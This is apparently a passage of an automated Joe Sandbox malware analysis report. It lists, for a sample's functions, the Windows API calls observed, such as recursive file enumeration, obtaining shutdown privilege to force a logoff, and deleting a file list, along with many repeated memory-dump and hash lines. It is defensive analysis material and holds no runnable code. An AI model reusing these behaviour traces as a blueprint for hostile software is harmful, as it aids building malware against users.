                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @J2G$L$L$NJC7$W$a$a$b$d$i$o$r$r$y
                                                                                                                        • API String ID: 0-3995663177
                                                                                                                        • Opcode ID: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                        • Instruction ID: 252a6d8ed46e94f7374cf00b11fef3c12c06f11e1c1bd39a3460dd2fa65f4b0d
                                                                                                                        • Opcode Fuzzy Hash: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                        • Instruction Fuzzy Hash: 849133A1D142948AF7258B24EC597EB7675EF91300F0440FED44AAB381E27E1F91CB2B
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414CC8
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$CloseNext
                                                                                                                        • String ID: *.*$\$\*.*
                                                                                                                        • API String ID: 2001080981-2301768657
                                                                                                                        • Opcode ID: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                        • Instruction ID: a8a72605bd69f8ac0c64504b566f5f70f8f2b3987ac3faeae44afcbdd81da1c4
                                                                                                                        • Opcode Fuzzy Hash: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                        • Instruction Fuzzy Hash: 707139711087854BD721CB24A8187FBB7D9EFC2305F14492AEDC597341EB38988A87AA
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413853
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0041385A
                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00413874
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 004138B4
                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004138BE
                                                                                                                        • GetLastError.KERNEL32(00000400,00000000,00000000,00000000), ref: 004138D4
                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004138E2
                                                                                                                        • LocalFree.KERNEL32(?,?,SHUTDOWN FAILED,00000000), ref: 004138FF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitFormatFreeLastLocalLookupMessageOpenPrivilegePrivilegesValueWindows
                                                                                                                        • String ID: SHUTDOWN FAILED$SeShutdownPrivilege
                                                                                                                        • API String ID: 2448987565-1691336667
                                                                                                                        • Opcode ID: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                        • Instruction ID: 07b04e0414a2500c08cba524246ac508bc9e29567ebddda6aac245e4067d3e71
                                                                                                                        • Opcode Fuzzy Hash: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                        • Instruction Fuzzy Hash: 4E112EB4248300BBE310DF90DC4AF6BBBA8AB89B42F11451DFA45D61D1DBB495448B2A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00414F30: FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                          • Part of subcall function 00414F30: FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                        • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                          • Part of subcall function 00426C69: DeleteFileA.KERNEL32(?,0041900D,?,?,%s\filelist.txt,?,?), ref: 00426C6D
                                                                                                                          • Part of subcall function 00426C69: GetLastError.KERNEL32 ref: 00426C77
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$First$CloseDeleteErrorLast
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3118232422-438819550
                                                                                                                        • Opcode ID: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                        • Instruction ID: cbf47a1fe9aaabdb544cd48c2d0f09c466b47d1d9ba07135cc4e04564ba086e3
                                                                                                                        • Opcode Fuzzy Hash: 56d7cd1762512bf9ae3bf9e88e6d90c3cb8513fa3674023f66d597dc73aeefa7
                                                                                                                        • Instruction Fuzzy Hash: 47F14D3120CB86CBC721CB288864BFBB7D5AFD6344F544A6DE8C987341EB359849C796
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,0040F4C0,?,00000000,?,?,00000000,00000000,?,?,0000005C,00000000), ref: 00415714
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1974802433-438819550
                                                                                                                        • Opcode ID: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                        • Instruction ID: 1877e94ef0ce8ff5fbf0691ca38f6eac6a25572973ee1466535c20e71dfeb6f4
                                                                                                                        • Opcode Fuzzy Hash: 54f61200abbc225797f1c0ce2760cdaf0bd9c0ffbedeba8a52273200a21410e9
                                                                                                                        • Instruction Fuzzy Hash: 34C10931208B86CBC721CB2484647FBB7E5BFD6345F58496EE8C683301EB35984AC796
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$CloseNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2001080981-438819550
                                                                                                                        • Opcode ID: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                        • Instruction ID: d464e212dd68eb2a0debe0c153d34ad098e3c75a0d726ec831b8764db62cd133
                                                                                                                        • Opcode Fuzzy Hash: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                        • Instruction Fuzzy Hash: 7C8125351087C68BC725DF249824BEBB7D5EFD3345F144A2AE8C587340EB39988AC795
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$CloseNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2001080981-438819550
                                                                                                                        • Opcode ID: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                        • Instruction ID: 72dfbb3d70468e9ec892d8d425d37a8d7061e44efa945190d4a59d62a0781805
                                                                                                                        • Opcode Fuzzy Hash: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                        • Instruction Fuzzy Hash: 465134351087C58BC725DF2498247EBB7D5FBD2305F144A2EE8C587341EB39988AC796
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 3541575487-1173974218
                                                                                                                        • Opcode ID: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                        • Instruction ID: 73ed92b0838a6fd84eecc73f45936914938e06500c24726ad6d6a21ef8ce5d97
                                                                                                                        • Opcode Fuzzy Hash: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                        • Instruction Fuzzy Hash: 14414C751087854BC721CB24A8147FBBBD5FBD2306F144929EDC587301EB39988AC7AA
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA), ref: 0040F690
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F697
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0040F6AB
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0040F6CF
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0040F6EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
